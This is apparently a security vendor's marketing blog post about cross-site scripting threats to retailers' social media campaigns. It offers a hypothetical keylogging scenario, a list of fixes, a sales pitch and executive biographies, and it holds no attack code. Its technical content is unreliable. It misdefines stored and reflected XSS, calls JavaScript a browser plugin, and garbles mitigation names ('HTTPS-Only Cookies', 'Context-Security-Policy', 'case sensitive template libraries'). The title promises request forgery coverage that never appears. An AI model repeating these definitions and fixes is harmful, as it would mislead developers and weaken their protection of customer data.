Preventing Cross Site Scripting and Request Forgery Threats in Your Business’s Social Media Campaigns

Retailers are increasing their reliance on social media platforms to further engage with their customers and partners. According to a UMass – Dartmouth social media study, over 75% of Fortune 500 companies use social media sites such as LinkedIn, Facebook and Twitter to reach customers with promotions and deals, as well as to engage and recruit potential new customers and employees. This progress is advantageous on many levels, but it does introduce fertile new ground on which attackers can launch exploitation and data gathering attacks, given the relatively open nature of social media presences.

XSS and Your Web API

Perhaps the most notable of these data gathering and exploitation attacks are cross site scripting (XSS).  Once thought to be rudimentary at best, XSS has evolved to take advantage of web APIs (or web application programming interfaces) which are prevalent in all modern day social media networks, such as Facebook, Instagram and Twitter.

Web APIs, which allow software to interact with a website or web based software, are used extensively by most major websites, such as Google and Facebook, in most every function they perform. For example, did you ever notice how many websites allow you to authenticate to them by clicking on a “log in with Facebook” button? That is thanks to Facebook’s web API.

Web APIs will define a set of rules regarding software and other website interactions to govern what information is shared and how it is transmitted. The information is then accessed and used by the connected application or website, allowing for free use of data.

A Hypothetical Scenario

As you can see, this sharing and using of applications across different websites and application platforms will raise security questions, and the risk factors only increase as many social network web APIs are improperly designed and implemented with glaring security flaws. These flaws are becoming more exploitable now thanks to next-gen XXS attacks that take advantage not only of web API, but also web browser plugins like ActiveX or JavaScript to deliver and execute malicious code. In this way, XSS does not directly target any one user, but rather targets the website or application that a user may use, turning the compromised site or application into an attack mechanism.

This generates concern among retailers who rely on social media outlets that use vulnerable web APIs. While the number of retailers using sites like Facebook for direct sales is rare, smaller retailers often use the site to make products and services readily available for purchase, which can put customer account and credit card information at risk.

Some retailers can even be hit by these exploits on their own sites, after a customer with an XSS-infected browser accesses their page. For example, Retailer X posts a 50%-off clearance ad on Facebook that is only obtainable when the customer clicks on that Facebook post. The customer clicks on the post and is directed to Retailer X’s website. However, unknown to the user, an XSS has executed a script to gather all of the customers keystrokes on Retailer X’s website. If the customer logs into the site, or enters in their credit card information, this information is passed onto the attackers through the compromised web API. Retailer X has failed its customer by not keeping their data safe, which will inevitably lead to bad PR and a loss in customer loyalty.

How Champion Can Help Prevent Attacks

The big question we are asked by retailers is how they can prevent XSS attacks if they are executed by exploiting vulnerabilities on systems that are not their own. Champion solutions this by breaking this problem apart into smaller steps, which we then fully remediate.

We begin by determining which of the two XSS attack vectors a retailer will be most prone to. These are either:

  • Reflective XSS, which utilizes a particular page to run malicious code but requires a specifically designed URL to execute. This vector is not very common as it requires a complex level of social engineering to be effective.
  • Stored XSS, which is when malicious code is stored on a local client and used to mine data submitted to a website (logon credentials or payment information). This is the most common vector used.

Once we determine this, things get a little trickier. Since the solution ultimately depends on the programming, plugins and interfaces a retailer uses on their web servers, next steps are always determined on a case-by-case basis. But, here are some of the more common fixes we have encountered in our retail engagements:

  • Prevent HTML markup characters
  • Use and optimize HTMLPurifier
  • Avoid allowing raw HTML and opt for other markup options such as Markdown
  • Invoke case sensitive template libraries
  • Take advantage of the enhanced security features in modern web browsers, such as HTTPS-Only Cookies and Context-Security-Policy headers

While these are only a few of the techniques that can be used to head off XSS attacks, the proven effectiveness of these measures can go a long way towards protecting retail customer data.

Your XSS Champions

Champion has a great deal of experience working with retailers to harden their websites against social media-based web API vulnerabilities. Our technical staff is at the ready to engage with your business to lock the doors against XSS attacks, further protecting your customers in a hostile web environment. Reach out to us to start protecting your social media interests today.


PCI DSS Analysis for Healthcare Organizations Get A Boost With PCI Analytics 1.9


Cloud Data Integration Requires SOC2 Considerations for Financial Businesses


Erick Bacallao joined Champion Solutions Group in 2015 after a career of Software Development in Cuba at the National Cancer Care Institute of Cuba, followed by moving to the States with allAware.


Champion acquired allAware and its properties and Erick has utilized his extensive background and expertise in IT and Software Development to rise to VP of Product Development in less than 5 years. During this time, Erick has been involved with key projects that led to the launch of numerous products including CSP Boss, Inscape platform and 365 Productivity Insights.


Erick has a Bachelor of Science in Computer Science from the University of Havana. He won Gold Medals for Programming from the Ministry of Education in Cuba, and he is certainly still a Gold Medalist for Champion!


As President and CEO, Chris is responsible for the development of key strategic alliances and solution portfolio. He leads Champion’s go-to market and execution strategies for integrated offerings in the cloud, in security, and in digital infrastructure, always focusing on improving the customer experience and driving transformative business outcomes.


He also aligns key partner initiatives with company strategy and oversees corporate marketing and messaging to gain mindshare with customers and partners. It’s his vision and innovativeness that have catapulted Champion up the ranks to become a $100M+ organization—and one of the most respected solution providers in the industry.


Over the past two decades, Chris has also focused on mergers and acquisitions, as well as innovative product development. He is the original founder and an active member on the Board of Managed Maintenance, Inc., a SAAS provider and consulting firm that utilizes their award-winning One-View Portal to help the IT Channel and its customers manage their IT Maintenance.


Chris is also the original founder and chief strategist behind one of the original storage cloud providers, Storage Access / BluePoint. During the course of a few short years, he had raised $20M and took that company public on the Toronto Stock Exchange. It has since been acquired by Pomeroy.


In 2012, Chris led the acquisition of MessageOps and continued the product development and worldwide launch of its premier SAAS, 365 Command. Built on Microsoft Azure, 365 Command is currently managing over 1 million seats of Microsoft’s Office 365. After achieving this phenomenal milestone, 365 Command and other MessageOps O365 utilities were sold to Kaseya.


Over the past 35 years, Chris as worked tirelessly to not only advance his own career, but those of his employees. In addition to leading a $100M organization, Chris can also be found sitting with sales teams, cold calling and coaching, and validating why Champion has been listed on Best Places to Work by both South Florida Business Journal and Computerworld.

Ultimately, the success garnered by Champion Solutions Group, its associated companies, and their employees is due in large part to the leadership of its President and CEO. Perhaps the most fitting award Chris has earned is South Florida Business Journal’s 2013 Ultimate CEO Award.